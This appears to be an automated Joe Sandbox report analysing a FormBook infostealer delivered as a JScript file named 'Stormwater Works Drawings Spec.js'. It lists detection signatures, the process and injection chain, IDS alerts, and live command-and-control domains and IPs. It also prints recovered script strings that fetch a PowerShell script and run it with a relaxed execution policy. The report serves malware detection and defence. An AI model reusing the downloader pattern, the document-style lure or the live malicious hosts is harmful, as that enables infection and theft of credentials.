Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Stormwater Works Drawings Spec.js

Overview

General Information

Sample name:Stormwater Works Drawings Spec.js
Analysis ID:1623349
MD5:ea7b7236f0f1492741e129ffc3862f5f
SHA1:99ef8587542810491e92acce623ffa2f61ea28c6
SHA256:7a86d3036e570c8db66e3a885075739fd6a3c890b1d37ee7a66a9655b640be3a
Tags:jsuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains potential unpacker
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
JavaScript source code contains functionality to generate code involving a shell, file or stream
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: AspNetCompiler Execution
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6920 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Stormwater Works Drawings Spec.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6304 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\downloaded_script.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • JXCJKXCJHKJHXCJHKXCXCJHK.exe (PID: 1072 cmdline: "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe" MD5: 81AD8AA4D4325CF57F364B0604DCCF09)
        • aspnet_compiler.exe (PID: 2596 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
          • xBjKgBCuI1jq.exe (PID: 5012 cmdline: "C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\lb5QVUC8Y.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
            • runonce.exe (PID: 6304 cmdline: "C:\Windows\SysWOW64\runonce.exe" MD5: 9E16655119DDE1B24A741C4FD4AD08FC)
      • xBjKgBCuI1jq.exe (PID: 2692 cmdline: "C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\iKbsHfBqN.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
      • firefox.exe (PID: 7124 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000009.00000002.2975519178.00000000042C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.2212915284.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000009.00000002.2974122884.0000000002600000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000A.00000002.2975394799.0000000002940000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000009.00000002.2975585559.0000000004310000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries
            SourceRuleDescriptionAuthorStrings
            4.2.aspnet_compiler.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              4.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\SysWOW64\runonce.exe, SourceProcessId: 6304, StartAddress: 262CEBE, TargetImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, TargetProcessId: 6304
                Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 108.181.20.35, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6920, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Stormwater Works Drawings Spec.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Stormwater Works Drawings Spec.js", CommandLine|base64offset|contains: Z, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Stormwater Works Drawings Spec.js", ProcessId: 6920, ProcessName: wscript.exe
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe, ParentProcessId: 1072, ParentProcessName: JXCJKXCJHKJHXCJHKXCXCJHK.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 2596, ProcessName: aspnet_compiler.exe
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 108.181.20.35, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6920, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Stormwater Works Drawings Spec.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Stormwater Works Drawings Spec.js", CommandLine|base64offset|contains: Z, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Stormwater Works Drawings Spec.js", ProcessId: 6920, ProcessName: wscript.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\downloaded_script.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\downloaded_script.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Stormwater Works Drawings Spec.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6920, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\downloaded_script.ps1", ProcessId: 6304, ProcessName: powershell.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-25T07:26:10.990974+010020188561A Network Trojan was detected108.181.20.35443192.168.2.449731TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-25T07:27:15.033315+010028554651A Network Trojan was detected192.168.2.449798162.218.30.23580TCP
                2025-02-25T07:27:38.794800+010028554651A Network Trojan was detected192.168.2.449951103.106.67.11280TCP
                2025-02-25T07:27:52.211817+010028554651A Network Trojan was detected192.168.2.450012104.21.32.180TCP
                2025-02-25T07:28:05.654652+010028554651A Network Trojan was detected192.168.2.450016104.21.48.180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-25T07:27:31.141297+010028554641A Network Trojan was detected192.168.2.449899103.106.67.11280TCP
                2025-02-25T07:27:33.700914+010028554641A Network Trojan was detected192.168.2.449919103.106.67.11280TCP
                2025-02-25T07:27:36.316829+010028554641A Network Trojan was detected192.168.2.449935103.106.67.11280TCP
                2025-02-25T07:27:44.573122+010028554641A Network Trojan was detected192.168.2.449987104.21.32.180TCP
                2025-02-25T07:27:47.907078+010028554641A Network Trojan was detected192.168.2.450007104.21.32.180TCP
                2025-02-25T07:27:50.469349+010028554641A Network Trojan was detected192.168.2.450011104.21.32.180TCP
                2025-02-25T07:27:58.101717+010028554641A Network Trojan was detected192.168.2.450013104.21.48.180TCP
                2025-02-25T07:28:00.495470+010028554641A Network Trojan was detected192.168.2.450014104.21.48.180TCP
                2025-02-25T07:28:03.097961+010028554641A Network Trojan was detected192.168.2.450015104.21.48.180TCP
                2025-02-25T07:28:11.983431+010028554641A Network Trojan was detected192.168.2.450017134.122.135.4880TCP
                2025-02-25T07:28:14.560558+010028554641A Network Trojan was detected192.168.2.450018134.122.135.4880TCP
                2025-02-25T07:28:17.124089+010028554641A Network Trojan was detected192.168.2.450019134.122.135.4880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-25T07:26:10.902493+010028275781A Network Trojan was detected192.168.2.449731108.181.20.35443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://www.tumbetgirislinki.fit/k566/?CL=RARW43WNMKajmHobqktuR6SSs++r69WXvXreCHJ6fEp5jkldk9mcWmm/U2k918FOdcoJ/x5nnQwLxIae2MHe/M4SnSZZuBmldonFkNjvznFjfMe0yaUlTKw=&Cf=xxUlW2vX-dIPmnP0Avira URL Cloud: Label: phishing
                Source: https://www.seasay.xyz/c9ts/?CL=b2h4705j/BXuiRKuOXJLA/Ych4Avira URL Cloud: Label: malware
                Source: http://www.seasay.xyz/c9ts/?CL=b2h4705j/BXuiRKuOXJLA/Ych4+2MinMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJnRUVMUOnSQnGJ4mxt7RzM6wNjAHWVIo4recboKbaao8YnR4NtOnxQ=&Cf=xxUlW2vX-dIPmnP0Avira URL Cloud: Label: malware
                Source: http://www.l63339.xyz/vhr7/?Cf=xxUlW2vX-dIPmnP0&CL=iaSfD1StI7hDT4qLPsiE2zQeJuTNjk7n7gYmLjmbAGxKTACTDmsoqhtbBCAt1Ym3ncJClzXtgr7Snspij9c4t0mW0LdNsZ/ysFr93T3fDTPWMGFwNTiC4gY=Avira URL Cloud: Label: malware
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeAvira: detection malicious, Label: TR/Dropper.Gen
                Source: Stormwater Works Drawings Spec.jsVirustotal: Detection: 13%Perma Link
                Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.2975519178.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2212915284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2974122884.0000000002600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2975394799.0000000002940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2975585559.0000000004310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2975527650.0000000003570000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2217495881.0000000001290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2217981667.0000000001D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: Binary string: runonce.pdbGCTL source: aspnet_compiler.exe, 00000004.00000002.2213460510.0000000000958000.00000004.00000020.00020000.00000000.sdmp, xBjKgBCuI1jq.exe, 00000008.00000002.2974936676.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000004.00000002.2213941533.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000009.00000003.2213305486.00000000041C1000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 00000009.00000002.2975775287.00000000046CE000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000009.00000002.2975775287.0000000004530000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000009.00000003.2215237417.000000000437B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000004.00000002.2213941533.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, runonce.exe, 00000009.00000003.2213305486.00000000041C1000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 00000009.00000002.2975775287.00000000046CE000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000009.00000002.2975775287.0000000004530000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000009.00000003.2215237417.000000000437B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\VICTOR\Documents\CryptoObfuscator_Output\VZBXV4444.pdb source: powershell.exe, 00000001.00000002.1778622855.000001CFDAE3C000.00000004.00000800.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe.1.dr
                Source: Binary string: runonce.pdb source: aspnet_compiler.exe, 00000004.00000002.2213460510.0000000000958000.00000004.00000020.00020000.00000000.sdmp, xBjKgBCuI1jq.exe, 00000008.00000002.2974936676.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\VICTOR\Documents\CryptoObfuscator_Output\VZBXV4444.pdbBSJB source: powershell.exe, 00000001.00000002.1778622855.000001CFDAE3C000.00000004.00000800.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe.1.dr
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xBjKgBCuI1jq.exe, 00000008.00000000.2132371221.000000000021F000.00000002.00000001.01000000.0000000A.sdmp, xBjKgBCuI1jq.exe, 0000000A.00000000.2281413073.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0261C8D0 FindFirstFileW,FindNextFileW,FindClose,9_2_0261C8D0

                Software Vulnerabilities

                barindex
                Source: Stormwater Works Drawings Spec.jsReturn value : ['6661216fuMSGJ,4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,']Go to definition
                Source: Stormwater Works Drawings Spec.jsReturn value : ['6661216fuMSGJ,4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,']Go to definition
                Source: Stormwater Works Drawings Spec.jsReturn value : ['6661216fuMSGJ,4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,', '"Scripting.FileSystemObject"']Go to definition
                Source: Stormwater Works Drawings Spec.jsReturn value : ['6661216fuMSGJ,4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,', '"Scripting.FileSystemObject"', '4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,GET,3890340cHs']Go to definition
                Source: Stormwater Works Drawings Spec.jsReturn value : ['6661216fuMSGJ,4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,', '"Scripting.FileSystemObject"', '4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,GET,3890340cHs']Go to definition
                Source: Stormwater Works Drawings Spec.jsReturn value : ['6661216fuMSGJ,4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,', '"Scripting.FileSystemObject"', '4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,GET,3890340cHs']Go to definition
                Source: Stormwater Works Drawings Spec.jsArgument value : ['6661216fuMSGJ,4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,', '"Scripting.FileSystemObject"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\downloaded_script.ps1"",0,true', '4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,GET,3890340cHs']Go to definition
                Source: Stormwater Works Drawings Spec.jsReturn value : ['6661216fuMSGJ,4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,', '"Scripting.FileSystemObject"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\downloaded_script.ps1"",0,true', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', '4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,GET,3890340cHs']Go to definition
                Source: Stormwater Works Drawings Spec.jsReturn value : ['"WScript.Shell"', '6661216fuMSGJ,4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,', '"Scripting.FileSystemObject"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\downloaded_script.ps1"",0,true', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', '4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,GET,3890340cHs']Go to definition
                Source: Stormwater Works Drawings Spec.jsReturn value : ['"WScript.Shell"', '6661216fuMSGJ,4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,', '"Scripting.FileSystemObject"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\downloaded_script.ps1"",0,true', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', '4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,GET,3890340cHs']Go to definition
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 4x nop then xor eax, eax9_2_02609EF0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 4x nop then mov ebx, 00000004h9_2_044104E8
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeCode function: 4x nop then pop edi10_2_0297AA1A
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeCode function: 4x nop then xor eax, eax10_2_02980217
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeCode function: 4x nop then pop edi10_2_0297CA09
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeCode function: 4x nop then pop edi10_2_0298B8B0
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeCode function: 4x nop then pop edi10_2_0298B8FD
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeCode function: 4x nop then pop edi10_2_0298B818
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeCode function: 4x nop then pop edi10_2_0298B98E
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeCode function: 4x nop then pop edi10_2_0298B7D4

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49798 -> 162.218.30.235:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49919 -> 103.106.67.112:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49899 -> 103.106.67.112:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49951 -> 103.106.67.112:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49935 -> 103.106.67.112:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50007 -> 104.21.32.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50013 -> 104.21.48.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50016 -> 104.21.48.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49987 -> 104.21.32.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50015 -> 104.21.48.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50014 -> 104.21.48.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50011 -> 104.21.32.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 134.122.135.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50012 -> 104.21.32.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 134.122.135.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50018 -> 134.122.135.48:80
                Source: Network trafficSuricata IDS: 2827578 - Severity 1 - ETPRO MALWARE Likely Dropper Doc GET to .moe TLD : 192.168.2.4:49731 -> 108.181.20.35:443
                Source: Network trafficSuricata IDS: 2018856 - Severity 1 - ET MALWARE Windows executable base64 encoded : 108.181.20.35:443 -> 192.168.2.4:49731
                Source: C:\Windows\System32\wscript.exeNetwork Connect: 108.181.20.35 443Jump to behavior
                Source: Stormwater Works Drawings Spec.jsReturn value : ['6661216fuMSGJ,4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,']Go to definition
                Source: Stormwater Works Drawings Spec.jsReturn value : ['6661216fuMSGJ,4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,']Go to definition
                Source: Stormwater Works Drawings Spec.jsReturn value : ['"Send"']Go to definition
                Source: Stormwater Works Drawings Spec.jsReturn value : ['6661216fuMSGJ,4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,', '4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,GET,3890340cHs']Go to definition
                Source: Stormwater Works Drawings Spec.jsReturn value : ['"Send"']Go to definition
                Source: Stormwater Works Drawings Spec.jsReturn value : ['6661216fuMSGJ,4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,', '4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,GET,3890340cHs']Go to definition
                Source: Stormwater Works Drawings Spec.jsReturn value : ['"Send"']Go to definition
                Source: Stormwater Works Drawings Spec.jsArgument value : ['"MSXML2.XMLHTTP"']Go to definition
                Source: Stormwater Works Drawings Spec.jsReturn value : ['"Send"']Go to definition
                Source: Stormwater Works Drawings Spec.jsReturn value : ['6661216fuMSGJ,4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,']Go to definition
                Source: DNS query: www.l63339.xyz
                Source: DNS query: www.seasay.xyz
                Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
                Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
                Source: Joe Sandbox ViewIP Address: 103.106.67.112 103.106.67.112
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
